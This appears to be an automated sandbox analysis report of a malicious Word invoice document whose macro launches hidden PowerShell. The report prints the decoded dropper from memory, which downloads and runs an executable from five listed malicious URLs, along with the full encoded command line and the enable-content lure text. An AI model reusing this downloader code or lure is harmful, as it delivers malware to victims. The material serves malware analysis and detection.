Windows Analysis Report
INV_PO_12172019EX.doc

Overview

General Information

Sample Name: INV_PO_12172019EX.doc
Analysis ID: 800690
MD5: 3b7fa78ebf399bb0230590bfec589fa7
SHA1: 199d4646fdbf9b5167d80ed71ce0ea406c40b018
SHA256: 5c2dc72128d235ecdca49e4026ec782cdce9021c5b46ebf841000bab5ebcc129
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Encrypted powershell cmdline option found
Very long command line found
Creates processes via WMI
Suspicious powershell command line found
Machine Learning detection for sample
Potential dropper URLs found in powershell memory
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Document contains an embedded VBA macro which executes code when the document is opened / closed
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains an ObjectPool stream indicating possible embedded files or OLE objects
Potential document exploit detected (unknown TCP traffic)
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: INV_PO_12172019EX.doc ReversingLabs: Detection: 29%
Source: INV_PO_12172019EX.doc Virustotal: Detection: 70% Perma Link
Antivirus / Scanner detection for submitted sample
Source: INV_PO_12172019EX.doc Avira: detected
Antivirus detection for URL or domain
Source: https://diagnostica-products.com/wp-admin/hio2u7w/PE Avira URL Cloud: Label: malware
Source: https://diagnostica-products.com/wp-admin/hio2u7w/ Avira URL Cloud: Label: malware
Source: http://amstaffrecords.com/individualApi/0/ Avira URL Cloud: Label: malware
Source: http://amstaffrecords.com/indivi Avira URL Cloud: Label: phishing
Source: http://amstaffrecords.com Avira URL Cloud: Label: phishing
Source: http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/ Avira URL Cloud: Label: malware
Source: http://dev2.ektonendon.gr Avira URL Cloud: Label: phishing
Multi AV Scanner detection for domain / URL
Source: dev2.ektonendon.gr Virustotal: Detection: 7% Perma Link
Source: amstaffrecords.com Virustotal: Detection: 8% Perma Link
Machine Learning detection for sample
Source: INV_PO_12172019EX.doc Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: tomation.pdb source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdb source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb56a source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdbIL source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbstem.M source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdb1. source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: emti.pdb source: powershell.exe, 00000005.00000002.941139445.000000001B3A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbll source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 8ystem.pdb source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.929675315.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: amstaffrecords.com
Source: global traffic DNS query: name: foozoop.com
Source: global traffic DNS query: name: 7arasport.com
Source: global traffic DNS query: name: ww38.7arasport.com
Source: global traffic DNS query: name: dev2.ektonendon.gr
Source: global traffic DNS query: name: diagnostica-products.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 103.224.212.222:80
Source: global traffic TCP traffic: 103.224.212.222:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 103.224.212.222:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 103.224.212.222:80
Source: global traffic TCP traffic: 103.224.212.222:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 103.224.212.222:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 103.224.212.222:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 103.224.212.222:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 103.224.212.222:80
Source: global traffic TCP traffic: 103.224.212.222:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 13.248.148.254:80
Source: global traffic TCP traffic: 13.248.148.254:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 13.248.148.254:80
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 13.248.148.254:80
Source: global traffic TCP traffic: 13.248.148.254:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 13.248.148.254:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 162.212.129.161:80
Source: global traffic TCP traffic: 13.248.148.254:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 13.248.148.254:80
Source: global traffic TCP traffic: 162.212.129.161:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 162.212.129.161:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 162.212.129.161:80
Source: global traffic TCP traffic: 162.212.129.161:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 162.212.129.161:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 162.212.129.161:80
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 13.248.148.254:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 103.224.212.222:80
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 13.248.148.254:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 162.212.129.161:80

Networking
barindex
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://amstaffrecords.com/individualApi/0/*http://foozoop.com/wp-content/Qxi7iVD/*http://7arasport.com/validatefield/gj/*http://
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://amstaffrecords.com/individualApi/0/*http://foozoop.com/wp-content/Qxi7iVD/*http://7arasport.com/validatefield/gj/*http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/*https://diagnostica-products.com/wp-admin/hio2u7w/
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://amstaffrecords.com/individualApi/0/*http://foozoop.com/wp-content/Qxi7iVD/*http://7arasport.com/validatefield/gj/*http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/*https://diagnostica-products.com/wp-admin/hio2u7w/PE
Source: powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp String found in memory: $Npzfrnzbrtium='Vffuwyhyigiyq';$Esxtydjpk = '873';$Ylnjqsscmpm='Wylqaidkqa';$Imxfrxtapo=$env:userprofile+'\'+$Esxtydjpk+'.exe';$Rryipjfhd='Ytidncigle';$Uwudrmogjlosm=&('new-'+'objec'+'t') neT.WEBcLIeNT;$Gpckyscyaendz='http://amstaffrecords.com/individualApi/0/*http://foozoop.com/wp-content/Qxi7iVD/*http://7arasport.com/validatefield/gj/*http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/*https://diagnostica-products.com/wp-admin/hio2u7w/'."s`PLit"('*');$Ixiqogfikm='Bttxghvinomws';foreach($Mbcnzgspat in $Gpckyscyaendz){try{$Uwudrmogjlosm."DOW`NLO`AD`FIlE"($Mbcnzgspat, $Imxfrxtapo);$Hhtobffplgs='Xaympicu';If ((.('G'+'et-'+'Item') $Imxfrxtapo)."l`EnG`TH" -ge 27169) {[Diagnostics.Process]::"sT`ARt"($Imxfrxtapo);$Eidytkly='Ybqxcuvdiqn';break;$Lmqahjcwywtk='Gwauuhlz'}}catch{}}$Onogqbumo='Ldkeogsafxnj'
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /validatefield/gj/ HTTP/1.1Host: 7arasport.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /validatefield/gj/ HTTP/1.1Host: ww38.7arasport.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cgi-bin/mTTCFmVe/ HTTP/1.1Host: dev2.ektonendon.grConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 13.248.148.254 13.248.148.254
Source: Joe Sandbox View IP Address: 13.248.148.254 13.248.148.254
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 07 Feb 2023 17:14:15 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 07 Feb 2023 17:14:15 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 17:14:15 GMTServer: ApacheStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 315Keep-Alive: timeout=3, max=500Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://7arasport.com
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://7arasport.com/validatefield/gj/
Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://amstaffrecords.com
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://amstaffrecords.com/indivi
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.941139445.000000001B40F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://amstaffrecords.com/individualApi/0/
Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dev2.ektonendon.gr
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/
Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foozoop.com
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foozoop.com/wp
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foozoop.com/wp-content/Qxi7iVD/
Source: powershell.exe, 00000005.00000002.929114441.000000000027E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ja.com/he
Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ww38.7arasport.com
Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ww38.7arasport.com/validatefield/gj/
Source: powershell.exe, 00000005.00000002.929114441.000000000027E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929114441.000000000024F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.929114441.000000000027E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929114441.000000000024F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://diagnostica-products.com
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://diagnostica-products.com/wp-admin/hio2u7w/
Source: powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://diagnostica-products.com/wp-admin/hio2u7w/PE
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{98B5056E-1AC7-42C9-BDDC-599C5AB91B4A}.tmp Jump to behavior
Source: unknown DNS traffic detected: queries for: amstaffrecords.com
Source: global traffic HTTP traffic detected: GET /validatefield/gj/ HTTP/1.1Host: 7arasport.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /validatefield/gj/ HTTP/1.1Host: ww38.7arasport.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cgi-bin/mTTCFmVe/ HTTP/1.1Host: dev2.ektonendon.grConnection: Keep-Alive

System Summary
barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing button from the yellow bar above. Once you have enabled editing, please click Enable
Source: Screenshot number: 4 Screenshot OCR: Enable content button from the yellow bar above. 0 Page: I of I , Words:O N@m 13 ;a 10096 G)
Source: Screenshot number: 8 Screenshot OCR: Enable content button from the yellow bar above O "g'"o' ' i WO""O i i '3 75% G) A GE) :a @
Source: Document image extraction number: 0 Screenshot OCR: Enable editing button from the yellow bar above. Once you have enabled editing, please click Enable
Source: Document image extraction number: 0 Screenshot OCR: Enable content button from the yellow bar above.
Source: Document image extraction number: 1 Screenshot OCR: Enable editing button from the yellow bar above. Once you have enabled editing, please click Enable
Source: Document image extraction number: 1 Screenshot OCR: Enable content button from the yellow bar above.
Very long command line found
Source: unknown Process created: Commandline size = 2153
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: INV_PO_12172019EX.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Vidpgeil, Function Document_open Name: Document_open
Source: ~DF413F6883B338D566.TMP.0.dr OLE, VBA macro line: Private Sub Document_open()
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~DFAAA31D5F4A1B1B2F.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFD6589A193BC4C172.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{4D8C8B4D-2408-4479-B193-86C1187A3D7D}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF413F6883B338D566.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Document contains an ObjectPool stream indicating possible embedded files or OLE objects
Source: INV_PO_12172019EX.doc OLE indicator, ObjectPool: true
Document contains embedded VBA macros
Source: INV_PO_12172019EX.doc OLE indicator, VBA macros: true
Source: ~DF413F6883B338D566.TMP.0.dr OLE indicator, VBA macros: true
Source: INV_PO_12172019EX.doc ReversingLabs: Detection: 29%
Source: INV_PO_12172019EX.doc Virustotal: Detection: 70%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -w hidden -en JABOAHAAegBmAHIAbgB6AGIAcgB0AGkAdQBtAD0AJwBWAGYAZgB1AHcAeQBoAHkAaQBnAGkAeQBxACcAOwAkAEUAcwB4AHQAeQBkAGoAcABrACAAPQAgACcAOAA3ADMAJwA7ACQAWQBsAG4AagBxAHMAcwBjAG0AcABtAD0AJwBXAHkAbABxAGEAaQBkAGsAcQBhACcAOwAkAEkAbQB4AGYAcgB4AHQAYQBwAG8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEUAcwB4AHQAeQBkAGoAcABrACsAJwAuAGUAeABlACcAOwAkAFIAcgB5AGkAcABqAGYAaABkAD0AJwBZAHQAaQBkAG4AYwBpAGcAbABlACcAOwAkAFUAdwB1AGQAcgBtAG8AZwBqAGwAbwBzAG0APQAmACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4AZQBUAC4AVwBFAEIAYwBMAEkAZQBOAFQAOwAkAEcAcABjAGsAeQBzAGMAeQBhAGUAbgBkAHoAPQAnAGgAdAB0AHAAOgAvAC8AYQBtAHMAdABhAGYAZgByAGUAYwBvAHIAZABzAC4AYwBvAG0ALwBpAG4AZABpAHYAaQBkAHUAYQBsAEEAcABpAC8AMAAvACoAaAB0AHQAcAA6AC8ALwBmAG8AbwB6AG8AbwBwAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AUQB4AGkANwBpAFYARAAvACoAaAB0AHQAcAA6AC8ALwA3AGEAcgBhAHMAcABvAHIAdAAuAGMAbwBtAC8AdgBhAGwAaQBkAGEAdABlAGYAaQBlAGwAZAAvAGcAagAvACoAaAB0AHQAcAA6AC8ALwBkAGUAdgAyAC4AZQBrAHQAbwBuAGUAbgBkAG8AbgAuAGcAcgAvAGMAZwBpAC0AYgBpAG4ALwBtAFQAVABDAEYAbQBWAGUALwAqAGgAdAB0AHAAcwA6AC8ALwBkAGkAYQBnAG4AbwBzAHQAaQBjAGEALQBwAHIAbwBkAHUAYwB0AHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGgAaQBvADIAdQA3AHcALwAnAC4AIgBzAGAAUABMAGkAdAAiACgAJwAqACcAKQA7ACQASQB4AGkAcQBvAGcAZgBpAGsAbQA9ACcAQgB0AHQAeABnAGgAdgBpAG4AbwBtAHcAcwAnADsAZgBvAHIAZQBhAGMAaAAoACQATQBiAGMAbgB6AGcAcwBwAGEAdAAgAGkAbgAgACQARwBwAGMAawB5AHMAYwB5AGEAZQBuAGQAegApAHsAdAByAHkAewAkAFUAdwB1AGQAcgBtAG8AZwBqAGwAbwBzAG0ALgAiAEQATwBXAGAATgBMAE8AYABBAEQAYABGAEkAbABFACIAKAAkAE0AYgBjAG4AegBnAHMAcABhAHQALAAgACQASQBtAHgAZgByAHgAdABhAHAAbwApADsAJABIAGgAdABvAGIAZgBmAHAAbABnAHMAPQAnAFgAYQB5AG0AcABpAGMAdQAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEkAbQB4AGYAcgB4AHQAYQBwAG8AKQAuACIAbABgAEUAbgBHAGAAVABIACIAIAAtAGcAZQAgADIANwAxADYAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAFIAdAAiACgAJABJAG0AeABmAHIAeAB0AGEAcABvACkAOwAkAEUAaQBkAHkAdABrAGwAeQA9ACcAWQBiAHEAeABjAHUAdgBkAGkAcQBuACcAOwBiAHIAZQBhAGsAOwAkAEwAbQBxAGEAaABqAGMAdwB5AHcAdABrAD0AJwBHAHcAYQB1AHUAaABsAHoAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATwBuAG8AZwBxAGIAdQBtAG8APQAnAEwAZABrAGUAbwBnAHMAYQBmAHgAbgBqACcA
Source: INV_PO_12172019EX.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\INV_PO_12172019EX.doc
Source: INV_PO_12172019EX.doc OLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$V_PO_12172019EX.doc Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR6E5B.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winDOC@2/19@6/4
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: INV_PO_12172019EX.doc OLE document summary: edited time not present or 0
Source: ~DFAAA31D5F4A1B1B2F.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DFAAA31D5F4A1B1B2F.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DFAAA31D5F4A1B1B2F.TMP.0.dr OLE document summary: edited time not present or 0
Source: ~DFD6589A193BC4C172.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DFD6589A193BC4C172.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DFD6589A193BC4C172.TMP.0.dr OLE document summary: edited time not present or 0
Source: ~WRF{4D8C8B4D-2408-4479-B193-86C1187A3D7D}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{4D8C8B4D-2408-4479-B193-86C1187A3D7D}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{4D8C8B4D-2408-4479-B193-86C1187A3D7D}.tmp.0.dr OLE document summary: edited time not present or 0
Source: ~DF413F6883B338D566.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DF413F6883B338D566.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DF413F6883B338D566.TMP.0.dr OLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\system32\MSFTEDIT.DLL Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
